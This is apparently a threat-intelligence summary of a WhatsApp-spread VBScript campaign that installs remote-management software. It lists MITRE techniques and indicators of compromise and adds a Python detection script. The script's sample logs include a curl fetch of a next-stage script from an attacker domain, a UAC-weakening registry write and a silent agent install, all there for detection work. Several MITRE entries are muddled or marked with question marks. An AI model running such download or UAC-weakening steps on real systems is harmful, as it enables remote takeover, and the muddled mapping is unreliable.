A VBScript campaign distributed through WhatsApp deploying RMM software

A June 2026 campaign spread malicious VBScript attachments through WhatsApp direct messages to users in multiple countries, with Malaysia seeing the highest number of victims. The scripts used financial-themed lures and a multi-stage infection chain that ended with the silent installation of ManageEngine Endpoint Central for remote access. #WhatsApp #ManageEngineEndpointCentral

Keypoints

  • Malicious VBScript files were distributed through WhatsApp direct messages in an active June 2026 campaign.
  • Victims were observed across Malaysia, Brazil, India, Mexico, Singapore, the UK, Spain, Taiwan, Australia, Russia, and Vietnam, with the largest share in Malaysia.
  • The threat actor used deceptive, finance-related file names such as invoices, statements, debt notices, and payment records to trick users into opening attachments.
  • Initial execution was triggered through WhatsApp Desktop or WhatsApp Web, with WScript.exe launching the first-stage script.
  • The infection chain downloaded additional VBScript payloads, attempted UAC-related registry changes, and ultimately installed a ZIP-bundled ManageEngine Endpoint Central agent.
  • Several artifacts, including Chinese comments and infrastructure overlap with ValleyRAT/Gh0st RAT-associated IPs, suggest possible Chinese-speaking involvement but no firm attribution.
  • The campaign abused compromised WhatsApp accounts to send attachments to contacts, and it remained active at the time of reporting.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The user had to open the attachment in WhatsApp Desktop or WhatsApp Web for the infection to begin, using deceptive file names like “Financial Reports.vbs” and “Debt confirmation.vbs” (‘When the user first clicks the attachment…it is downloaded to their machine’ and ‘deceptive file names designed to appear as legitimate business and financial documents’).
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – The campaign relied on VBScript/VBE files as the primary malware format and execution method (‘the script creates a working directory…downloads two additional VBScript payloads’ and ‘the malware was being distributed…malicious VBScript files’).
  • [T1105] Ingress Tool Transfer – Stage 1 and Stage 2 scripts downloaded additional payloads and ZIP content from attacker-controlled infrastructure (‘downloads two additional VBScript payloads from a remote infrastructure’ and ‘downloads a ZIP archive, extracts its contents’).
  • [T1027] Obfuscated Files or Information – The scripts used string concatenation, encoded VBScript, randomized variable names, junk content, and heavy obfuscation to hide functionality (‘string concatenation, encoded VBScript, randomized variable names, and large amounts of junk content’).
  • [T1218.011] System Binary Proxy Execution: Rundll32/Windows Script Host? – The malware used Windows Script Host to execute script files (‘the VBScript is launched through Windows Script Host (WScript.exe)’).
  • [T1036] Masquerading – The files and comments impersonated legitimate business documents and Windows Update components (‘appears as legitimate business and financial documents’ and ‘mimic legitimate Microsoft Windows Update components’).
  • [T1112] Modify Registry – One Stage 2 script repeatedly attempted to change the ConsentPromptBehaviorAdmin registry value to weaken UAC prompts (‘attempting to modify the ConsentPromptBehaviorAdmin registry value’).
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control – The script used runas and registry changes in an attempt to enable administrative actions without consent prompts (‘ShellExecute method with the runas verb’ and ‘set…value to 0, thus enabling administrative actions without displaying a consent prompt’).
  • [T1574.002] Hijack Execution Flow: DLL Search Order Hijacking? – Not clearly supported.
  • [T1053] Scheduled Task/Job – Not mentioned.
  • [T1113] Screen Capture – Not mentioned.
  • [T1219] Remote Access Software – The final stage installed the legitimate ManageEngine Endpoint Central RMM agent to provide remote access and administration (‘installation of remote monitoring and management software’ and ‘enabling remote access to the victim’s system’).
  • [T1505.001] Server Software Component: SQL Stored Procedures? – Not mentioned.
  • [T1110] Brute Force – Not mentioned.
  • [T1555] Credentials from Password Stores – Compromised WhatsApp accounts were used, but no direct credential theft method was described (‘the threat actor had gained access to several WhatsApp accounts’).
  • [T1078] Valid Accounts – The campaign used compromised WhatsApp accounts to send malicious attachments to contacts (‘had gained access to several WhatsApp accounts and used them to distribute the malicious VBScript files’).

Indicators of Compromise

  • [File names] Malicious WhatsApp attachments and staged scripts – Financial Reports.vbs, Debt confirmation.vbs, and other themed VBS/VBE/TXT payload names
  • [File paths] Execution and staging locations – C:\Users\Public\Documents, C:\Windows\System32\WScript.exe, and WhatsApp Desktop transfer directories under AppData\Local\Packages\5319275A.WhatsAppDesktop_cv1g1gvanyjgm
  • [IP addresses] Endpoint Central management infrastructure and related overlap – 202.61.160[.]208, 202.61.160[.]201, and 38.55.151[.]63
  • [Domains] Attacker-controlled download infrastructure – temu.baskwms[.]top, invoice.msopsa[.]top, and baoxis[.]cc
  • [Archives and installers] Stage 3 deployment package – UEMSAgent.msi, UEMSAgent.mst, and setup1.vbs within the ZIP archive
  • [Certificates and config files] Endpoint Central package contents – DMRootCA.crt, DMRootCA-Server.crt, and DCAgentServerInfo.json
  • [Executable names] Download and execution utilities – curl.exe, bitsadmin.exe, certutil, msiexec.exe, and explorer.exe
  • [Hashes] Numerous sample hashes were provided for VBS files – c7f38cbb99c8b74fa0465293feeba700, b7cd06c71465038b658a6dc1f273a507, and 2 more hashes
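As an added defensive illustration (not code from the Securelist report or from any vendor), the Python below sweeps constructed endpoint telemetry for the chain summarised in the key points and MITRE mapping above and matches the defanged network indicators from the list: a script host running a .vbs/.vbe from a WhatsApp package or Public\Documents path, a download utility spawned by that script host, ConsentPromptBehaviorAdmin being set to 0, a silent msiexec install of UEMSAgent.msi from a staging path, and contact with the listed domains and IPs. The pipe-delimited log format, the user name, the Transfers subfolder, the URL path and the benign slmgr.vbs control line are assumptions; indicator values, binary names and the registry value come from the page.

```python
"""Added example: triage constructed endpoint telemetry against the behaviours the
report describes. Log format and sample lines are constructed; only indicator values,
binary names and the registry value come from the report."""
import re

# Defanged network indicators copied from the report; refanged only for matching.
DEFANGED_DOMAINS = ["temu.baskwms[.]top", "invoice.msopsa[.]top", "baoxis[.]cc"]
DEFANGED_IPS = ["202.61.160[.]208", "202.61.160[.]201", "38.55.151[.]63"]


def refang(ioc: str) -> str:
    """Turn 'a[.]b' back into 'a.b' so it can be compared with live telemetry."""
    return ioc.replace("[.]", ".")


IOC_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}
IOC_IPS = {refang(i) for i in DEFANGED_IPS}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "bitsadmin.exe", "certutil.exe"}
# Staging locations named in the report, compared case-insensitively as substrings.
STAGING_PATHS = [r"\users\public\documents",
                 r"\packages\5319275a.whatsappdesktop_cv1g1gvanyjgm"]
UAC_KEY_SUFFIX = r"\policies\system\consentpromptbehavioradmin"


def parse(line: str) -> dict:
    """Constructed telemetry format: 'key=value' fields separated by '|'."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_staging(path: str) -> bool:
    p = path.lower()
    return any(s in p for s in STAGING_PATHS)


def rule_script_from_attachment(e: dict):
    # T1204.002 / T1059.005: script host executing a .vbs/.vbe from a staging path.
    if e.get("kind") != "process" or basename(e.get("image", "")) not in SCRIPT_HOSTS:
        return None
    m = re.search(r'"?([^"]+\.(?:vbs|vbe))"?', e.get("cmdline", ""), re.IGNORECASE)
    if m and in_staging(m.group(1)):
        return "T1204.002/T1059.005: script host running .vbs/.vbe from a WhatsApp or Public staging path"
    return None


def rule_script_spawned_downloader(e: dict):
    # T1105: a script host launching curl/bitsadmin/certutil to fetch the next stage.
    if (e.get("kind") == "process" and basename(e.get("parent", "")) in SCRIPT_HOSTS
            and basename(e.get("image", "")) in DOWNLOADERS):
        return "T1105: download utility spawned by a script host"
    return None


def rule_uac_weakening(e: dict):
    # T1112 / T1548.002: ConsentPromptBehaviorAdmin = 0 removes the admin consent prompt.
    if (e.get("kind") == "registry" and e.get("key", "").lower().endswith(UAC_KEY_SUFFIX)
            and e.get("value") == "0"):
        return "T1112/T1548.002: ConsentPromptBehaviorAdmin set to 0"
    return None


def rule_silent_rmm_install(e: dict):
    # T1219: msiexec installing the Endpoint Central agent package from a staging path.
    if e.get("kind") == "process" and basename(e.get("image", "")) == "msiexec.exe":
        cmd = e.get("cmdline", "").lower()
        if "uemsagent.msi" in cmd and in_staging(cmd):
            return "T1219: UEMSAgent.msi installed from a staging path"
    return None


def rule_known_infrastructure(e: dict):
    # Network contact with the domains/IPs listed in the report.
    if e.get("kind") == "network":
        dst = e.get("dst", "").lower()
        if dst in IOC_IPS or dst in IOC_DOMAINS:
            return f"known campaign infrastructure contacted: {dst}"
    return None


RULES = [rule_script_from_attachment, rule_script_spawned_downloader, rule_uac_weakening,
         rule_silent_rmm_install, rule_known_infrastructure]


def triage(lines):
    """Return (finding, raw line) pairs for every rule that fires, in log order."""
    findings = []
    for line in lines:
        event = parse(line)
        for rule in RULES:
            hit = rule(event)
            if hit:
                findings.append((hit, line))
    return findings


# Constructed sample telemetry (user name, Transfers subfolder and URL path are made up).
SAMPLE_LOG = [
    r'kind=process|image=C:\Windows\System32\WScript.exe|cmdline=wscript.exe "C:\Users\alice\AppData\Local\Packages\5319275A.WhatsAppDesktop_cv1g1gvanyjgm\Transfers\Financial Reports.vbs"|parent=WhatsApp.exe',
    r'kind=process|image=C:\Windows\System32\curl.exe|cmdline=curl.exe -o C:\Users\Public\Documents\stage2.vbs http://temu.baskwms.top/|parent=C:\Windows\System32\WScript.exe',
    r'kind=network|image=curl.exe|dst=temu.baskwms.top',
    r'kind=registry|image=C:\Windows\System32\WScript.exe|key=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin|value=0',
    r'kind=process|image=C:\Windows\System32\msiexec.exe|cmdline=msiexec.exe /i "C:\Users\Public\Documents\UEMSAgent.msi" TRANSFORMS="C:\Users\Public\Documents\UEMSAgent.mst" /qn|parent=C:\Windows\System32\WScript.exe',
    r'kind=process|image=C:\Windows\System32\cscript.exe|cmdline=cscript.exe C:\Windows\System32\slmgr.vbs /dlv|parent=cmd.exe',  # benign control: must not fire
    r'kind=network|dst=202.61.160.208',
]

if __name__ == "__main__":
    for finding, line in triage(SAMPLE_LOG):
        print(finding, "<=", line[:80])
```

The rules are deliberately behavioural rather than hash-based: the report notes that the scripts are heavily obfuscated with randomized names and junk content, so file hashes change between samples, whereas a script host reading a .vbs out of the WhatsApp package directory, a script host parenting curl or bitsadmin, and a ConsentPromptBehaviorAdmin write of 0 are stable across variants. The benign cscript.exe line shows why the staging-path check matters: Windows itself runs .vbs files through the same host.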


Read more: https://securelist.com/whatsapp-vbs-rmm-campaign/120290/